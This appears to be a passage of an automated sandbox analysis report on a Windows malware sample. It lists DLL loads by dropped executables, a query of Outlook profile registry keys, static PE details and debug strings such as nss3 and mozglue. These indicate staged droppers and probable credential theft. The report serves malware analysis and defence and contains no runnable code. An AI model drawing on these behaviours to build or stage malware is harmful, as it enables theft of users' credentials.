                              Source: C:\Users\user\AppData\Local\Temp\1017624001\941d08ea4f.exeSection loaded: profapi.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017624001\941d08ea4f.exeSection loaded: edputil.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017624001\941d08ea4f.exeSection loaded: urlmon.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017624001\941d08ea4f.exeSection loaded: iertutil.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017624001\941d08ea4f.exeSection loaded: srvcli.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017624001\941d08ea4f.exeSection loaded: netutils.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017624001\941d08ea4f.exeSection loaded: windows.staterepositoryps.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017624001\941d08ea4f.exeSection loaded: wintypes.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017624001\941d08ea4f.exeSection loaded: appresolver.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017624001\941d08ea4f.exeSection loaded: bcp47langs.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017624001\941d08ea4f.exeSection loaded: slc.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017624001\941d08ea4f.exeSection loaded: userenv.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017624001\941d08ea4f.exeSection loaded: sppc.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017624001\941d08ea4f.exeSection loaded: onecorecommonproxystub.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017624001\941d08ea4f.exeSection loaded: onecoreuapcommonproxystub.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeSection loaded: mscoree.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeSection loaded: apphelp.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeSection loaded: aclayers.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeSection loaded: mpr.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeSection loaded: sfc.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeSection loaded: sfc_os.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeSection loaded: kernel.appcore.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeSection loaded: version.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeSection loaded: uxtheme.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeSection loaded: windows.storage.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeSection loaded: wldp.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeSection loaded: profapi.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeSection loaded: cryptsp.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeSection loaded: rsaenh.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeSection loaded: cryptbase.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeSection loaded: dwrite.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeSection loaded: windowscodecs.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeSection loaded: amsi.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeSection loaded: userenv.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeSection loaded: msasn1.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeSection loaded: gpapi.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeSection loaded: textshaping.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeSection loaded: iconcodecservice.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeSection loaded: mscoree.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeSection loaded: apphelp.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeSection loaded: aclayers.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeSection loaded: mpr.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeSection loaded: sfc.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeSection loaded: sfc_os.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeSection loaded: kernel.appcore.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeSection loaded: version.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeSection loaded: windows.storage.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeSection loaded: wldp.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeSection loaded: profapi.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeSection loaded: cryptsp.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeSection loaded: rsaenh.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeSection loaded: cryptbase.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeSection loaded: amsi.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeSection loaded: userenv.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeSection loaded: msasn1.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeSection loaded: gpapi.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeSection loaded: wbemcomn.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeSection loaded: uxtheme.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017626001\ae64e67a81.exeSection loaded: apphelp.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017626001\ae64e67a81.exeSection loaded: aclayers.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017626001\ae64e67a81.exeSection loaded: mpr.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017626001\ae64e67a81.exeSection loaded: sfc.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017626001\ae64e67a81.exeSection loaded: sfc_os.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017626001\ae64e67a81.exeSection loaded: winmm.dll
                              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: apphelp.dll
                              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wbemcomn.dll
                              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: amsi.dll
                              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: userenv.dll
                              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: profapi.dll
                              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: version.dll
                              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: uxtheme.dll
                              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: windows.storage.dll
                              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wldp.dll
                              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: sspicli.dll
                              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: mpr.dll
                              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: powrprof.dll
                              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: umpdc.dll
                              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: devobj.dll
                              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: msasn1.dll
                              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wbemcomn.dll
                              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wbemcomn.dll
                              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wbemcomn.dll
                              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wbemcomn.dll
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winmm.dll
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wininet.dll
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: kernel.appcore.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exeSection loaded: mscoree.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exeSection loaded: apphelp.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exeSection loaded: aclayers.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exeSection loaded: mpr.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exeSection loaded: sfc.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exeSection loaded: sfc_os.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exeSection loaded: kernel.appcore.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exeSection loaded: version.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exeSection loaded: windows.storage.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exeSection loaded: wldp.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exeSection loaded: profapi.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exeSection loaded: cryptsp.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exeSection loaded: rsaenh.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exeSection loaded: cryptbase.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exeSection loaded: iphlpapi.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exeSection loaded: dnsapi.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exeSection loaded: dhcpcsvc6.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exeSection loaded: dhcpcsvc.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exeSection loaded: winnsi.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exeSection loaded: rasapi32.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exeSection loaded: rasman.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exeSection loaded: rtutils.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exeSection loaded: mswsock.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exeSection loaded: winhttp.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exeSection loaded: ondemandconnroutehelper.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exeSection loaded: rasadhlp.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exeSection loaded: fwpuclnt.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exeSection loaded: secur32.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exeSection loaded: sspicli.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exeSection loaded: schannel.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exeSection loaded: mskeyprotect.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exeSection loaded: ntasn1.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exeSection loaded: ncrypt.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exeSection loaded: ncryptsslp.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exeSection loaded: msasn1.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exeSection loaded: gpapi.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exeSection loaded: uxtheme.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exeSection loaded: propsys.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exeSection loaded: edputil.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exeSection loaded: urlmon.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exeSection loaded: iertutil.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exeSection loaded: srvcli.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exeSection loaded: netutils.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exeSection loaded: windows.staterepositoryps.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exeSection loaded: wintypes.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exeSection loaded: appresolver.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exeSection loaded: bcp47langs.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exeSection loaded: slc.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exeSection loaded: userenv.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exeSection loaded: sppc.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exeSection loaded: onecorecommonproxystub.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exeSection loaded: onecoreuapcommonproxystub.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dll
                              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: aclayers.dll
                              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: mpr.dll
                              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sfc.dll
                              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sfc_os.dll
                              Source: C:\Users\user\Documents\HIDGCFBFBF.exeSection loaded: apphelp.dll
                              Source: C:\Users\user\Documents\HIDGCFBFBF.exeSection loaded: aclayers.dll
                              Source: C:\Users\user\Documents\HIDGCFBFBF.exeSection loaded: mpr.dll
                              Source: C:\Users\user\Documents\HIDGCFBFBF.exeSection loaded: sfc.dll
                              Source: C:\Users\user\Documents\HIDGCFBFBF.exeSection loaded: sfc_os.dll
                              Source: C:\Users\user\Documents\HIDGCFBFBF.exeSection loaded: winmm.dll
                              Source: C:\Users\user\Documents\HIDGCFBFBF.exeSection loaded: wininet.dll
                              Source: C:\Users\user\Documents\HIDGCFBFBF.exeSection loaded: kernel.appcore.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017628001\7ab555facf.exeSection loaded: apphelp.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017628001\7ab555facf.exeSection loaded: aclayers.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017628001\7ab555facf.exeSection loaded: mpr.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017628001\7ab555facf.exeSection loaded: sfc.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017628001\7ab555facf.exeSection loaded: sfc_os.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017628001\7ab555facf.exeSection loaded: cryptsp.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017628001\7ab555facf.exeSection loaded: apphelp.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017628001\7ab555facf.exeSection loaded: aclayers.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017628001\7ab555facf.exeSection loaded: mpr.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017628001\7ab555facf.exeSection loaded: sfc.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017628001\7ab555facf.exeSection loaded: sfc_os.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017628001\7ab555facf.exeSection loaded: windows.storage.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017628001\7ab555facf.exeSection loaded: wldp.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017628001\7ab555facf.exeSection loaded: winhttp.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017628001\7ab555facf.exeSection loaded: ondemandconnroutehelper.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017628001\7ab555facf.exeSection loaded: webio.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017628001\7ab555facf.exeSection loaded: mswsock.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017628001\7ab555facf.exeSection loaded: iphlpapi.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017628001\7ab555facf.exeSection loaded: winnsi.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017628001\7ab555facf.exeSection loaded: sspicli.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017628001\7ab555facf.exeSection loaded: dnsapi.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017628001\7ab555facf.exeSection loaded: rasadhlp.dll
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32Jump to behavior
                              Source: Window RecorderWindow detected: More than 3 window changes detected
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001Jump to behavior
                              Source: Tii6ue74NB.exeStatic file information: File size 7292928 > 1048576
                              Source: Tii6ue74NB.exeStatic PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x6ec200
                              Source: Tii6ue74NB.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                              Source: Tii6ue74NB.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                              Source: Tii6ue74NB.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                              Source: Tii6ue74NB.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                              Source: Tii6ue74NB.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                              Source: Tii6ue74NB.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                              Source: Tii6ue74NB.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                              Source: Tii6ue74NB.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                              Source: Binary string: mozglue.pdbP source: 3m20j.exe, 0000000A.00000002.2513931504.000000006C1BD000.00000002.00000001.01000000.0000001A.sdmp
                              Source: Binary string: wextract.pdb source: Tii6ue74NB.exe, Tii6ue74NB.exe, 00000000.00000002.2543895110.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, i9z22.exe, i9z22.exe, 00000001.00000002.2514851973.0000000000621000.00000020.00000001.01000000.00000004.sdmp, P0D95.exe, P0D95.exe, 00000002.00000000.1821282688.00000000003E1000.00000020.00000001.01000000.00000005.sdmp
                              Source: Binary string: nss3.pdb@ source: 3m20j.exe, 0000000A.00000002.2512609278.000000006BFDF000.00000002.00000001.01000000.00000019.sdmp
                              Source: Binary string: wextract.pdbGCTL source: Tii6ue74NB.exe, 00000000.00000002.2543895110.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, i9z22.exe, 00000001.00000002.2514851973.0000000000621000.00000020.00000001.01000000.00000004.sdmp, P0D95.exe, 00000002.00000000.1821282688.00000000003E1000.00000020.00000001.01000000.00000005.sdmp
                              Source: Binary string: wkernel32.pdb source: ae64e67a81.exe, 00000013.00000003.2353199945.0000000005140000.00000004.00000001.00020000.00000000.sdmp, ae64e67a81.exe, 00000013.00000003.2353306605.0000000005260000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.2361311629.0000000005280000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.2361403790.00000000053A0000.00000004.00000001.00020000.00000000.sdmp
                              Source: Binary string: wkernelbase.pdb source: ae64e67a81.exe, 00000013.00000003.2353600190.0000000005140000.00000004.00000001.00020000.00000000.sdmp, ae64e67a81.exe, 00000013.00000003.2353783136.0000000005360000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.2361634003.0000000005280000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.2361824287.00000000054A0000.00000004.00000001.00020000.00000000.sdmp
                              Source: Binary string: ntdll.pdb source: ae64e67a81.exe, 00000013.00000003.2352326552.0000000005330000.00000004.00000001.00020000.00000000.sdmp, ae64e67a81.exe, 00000013.00000003.2352114707.0000000005140000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.2360262896.0000000005280000.00000004.00000001.00020000.00000000.sdmp
                              Source: Binary string: wntdll.pdbUGP source: ae64e67a81.exe, 00000013.00000003.2352667375.0000000005140000.00000004.00000001.00020000.00000000.sdmp, ae64e67a81.exe, 00000013.00000003.2352815052.00000000052E0000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.2360875199.0000000005280000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.2361109181.0000000005420000.00000004.00000001.00020000.00000000.sdmp
                              Source: Binary string: ntdll.pdbUGP source: ae64e67a81.exe, 00000013.00000003.2352326552.0000000005330000.00000004.00000001.00020000.00000000.sdmp, ae64e67a81.exe, 00000013.00000003.2352114707.0000000005140000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.2360262896.0000000005280000.00000004.00000001.00020000.00000000.sdmp
                              Source: Binary string: wntdll.pdb source: ae64e67a81.exe, 00000013.00000003.2352667375.0000000005140000.00000004.00000001.00020000.00000000.sdmp, ae64e67a81.exe, 00000013.00000003.2352815052.00000000052E0000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.2360875199.0000000005280000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.2361109181.0000000005420000.00000004.00000001.00020000.00000000.sdmp
                              Source: Binary string: protobuf-net.pdbSHA256}Lq source: fc1570cd0d.exe, 00000012.00000002.2310077330.0000000002881000.00000004.00000800.00020000.00000000.sdmp, fc1570cd0d.exe, 00000012.00000002.2314934318.0000000003881000.00000004.00000800.00020000.00000000.sdmp, fc1570cd0d.exe, 00000012.00000002.2314934318.000000000394D000.00000004.00000800.00020000.00000000.sdmp, fc1570cd0d.exe, 00000012.00000002.2319337155.00000000051C0000.00000004.08000000.00040000.00000000.sdmp
                              Source: Binary string: nss3.pdb source: 3m20j.exe, 0000000A.00000002.2512609278.000000006BFDF000.00000002.00000001.01000000.00000019.sdmp
                              Source: Binary string: mozglue.pdb source: 3m20j.exe, 0000000A.00000002.2513931504.000000006C1BD000.00000002.00000001.01000000.0000001A.sdmp
                              Source: Binary string: protobuf-net.pdb source: fc1570cd0d.exe, 00000012.00000002.2310077330.0000000002881000.00000004.00000800.00020000.00000000.sdmp, fc1570cd0d.exe, 00000012.00000002.2314934318.0000000003881000.00000004.00000800.00020000.00000000.sdmp, fc1570cd0d.exe, 00000012.00000002.2314934318.000000000394D000.00000004.00000800.00020000.00000000.sdmp, fc1570cd0d.exe, 00000012.00000002.2319337155.00000000051C0000.00000004.08000000.00040000.00000000.sdmp
                              Source: Binary string: wkernelbase.pdbUGP source: ae64e67a81.exe, 00000013.00000003.2353600190.0000000005140000.00000004.00000001.00020000.00000000.sdmp, ae64e67a81.exe, 00000013.00000003.2353783136.0000000005360000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.2361634003.0000000005280000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.2361824287.00000000054A0000.00000004.00000001.00020000.00000000.sdmp
